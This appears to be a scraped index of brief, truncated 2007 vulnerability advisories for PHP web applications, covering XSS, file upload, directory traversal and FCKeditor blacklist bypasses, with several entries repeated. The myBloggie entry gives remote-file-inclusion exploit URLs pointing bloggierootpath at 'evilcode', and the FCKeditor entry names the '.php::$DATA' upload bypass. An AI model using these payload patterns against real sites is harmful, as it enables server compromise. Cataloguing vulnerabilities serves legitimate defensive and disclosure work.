Cross site scripting
Multiple cross-site scripting (XSS) vulnerabilities in InterWorx Hosting Control Panel (InterWorx-CP) Server Admin Level (NodeWorx) 3.0.2 (1) allow remote attackers to inject arbitrary web script or HTML via the PATHINFO to index.php; and allow remote authenticated users to inject arbitrary web script or...
Unrestricted file upload
Unrestricted file upload vulnerability in banner-upload.php in Szymon Kosok Best Top List allows remote attackers to upload and execute arbitrary PHP files in banners/...
CVE-2007-4376
Unrestricted file upload vulnerability in banner-upload.php in Szymon Kosok Best Top List allows remote attackers to upload and execute arbitrary PHP files in banners/...
CVE-2007-4376
CVE-2007-4376 describes an unrestricted file upload vulnerability in banner-upload.php of the Szymon Kosok Best Top List. This allows remote attackers to upload and execute arbitrary PHP files in the banners/ directory. The provided documents do not include explicit root-cause details beyond the ...
Unrestricted file upload
Unrestricted file upload vulnerability in admin/pages/blog-add.php in Neuron Blog 1.1 allows remote attackers to upload and execute arbitrary PHP files in uploads/...
CVE-2007-4371
Unrestricted file upload vulnerability in admin/pages/blog-add.php in Neuron Blog 1.1 allows remote attackers to upload and execute arbitrary PHP files in uploads/...
CVE-2007-4088
Multiple cross-site scripting (XSS) vulnerabilities in Vikingboard 0.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) id, (2) f, (3) quote, and (4) act parameters to cp.php; the (5) u parameter to user.php; the (6) f parameter to post.php; the (7) s parameter to topic.php; the (8) quot...
Directory traversal
Multiple directory traversal vulnerabilities in Maia Mailguard 1.0.2 and earlier might allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) prevlang and (2) super parameters to (a) php/login.php; the (3) charset parameter to (a) php/login.php, (b) php/internal-init.php, and (c)...
CVE-2007-3163
Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2.4.2 allows remote attackers to upload arbitrary .php files via an alternate data stream syntax, as demonstrated by .php::$DATA filenames, a related issue to CVE-2006-0658...
myBloggie 2.1.5 Remote File Include
myBloggie 2.1.5 RFI. Author: Yaser. Homepage: http://www.ayyildiz.org. Download S : http://mywebland.com/download.php?id=19. Exploits: http://site/config.php?bloggierootpath=evilcode? http://site/includes/db.php?bloggierootpath=evilcode?...
Unrestricted file upload
Unrestricted file upload vulnerability in FileCloset before 1.1.5 allows remote attackers to upload arbitrary PHP files via unspecified vectors...
CVE-2007-2961
Unrestricted file upload vulnerability in FileCloset before 1.1.5 allows remote attackers to upload arbitrary PHP files via unspecified vectors...
CVE-2007-2961
CVE-2007-2961 concerns an Unrestricted file upload vulnerability in FileCloset before 1.1.5. The issue allows remote attackers to upload arbitrary PHP files via unspecified vectors. The NVD entry records a CVSSv2 base score of 7.5 (HIGH) with network attack vector and no authentication required; ...
CVE-2007-2630
Incomplete blacklist vulnerability in filemanager/browser/default/connectors/php/config.php in the FCKeditor module, as used in ActiveCampaign 1-2-All (aka 12All) 4.50 through 4.53.13, and possibly other products, allows remote authenticated administrators to upload and possibly execute .php4 and...
CVE-2007-2630
The CVE-2007-2630 entry concerns an Incomplete blacklist vulnerability in the FCKeditor module’s filemanager/browse paths (config.php) used by ActiveCampaign 1-2-All (12All) versions 4.50–4.53.13. The issue allows remote authenticated administrators to upload and possibly execute .php4/.php5 file...
CVE-2007-0609
Directory traversal vulnerability in Advanced Guestbook 2.4.2 allows remote attackers to bypass .htaccess settings, and execute arbitrary PHP local files or read arbitrary local templates, via a .. (dot dot) in a lang cookie, followed by a filename without its .php extension, as demonstrated via a...
Directory traversal
shared/code/tcetmx.php in TCExam 4.0.011 and earlier allows remote attackers to create arbitrary PHP files in cache/ by placing file contents and directory traversal manipulations into a SessionUserLang cookie to public/code/index.php...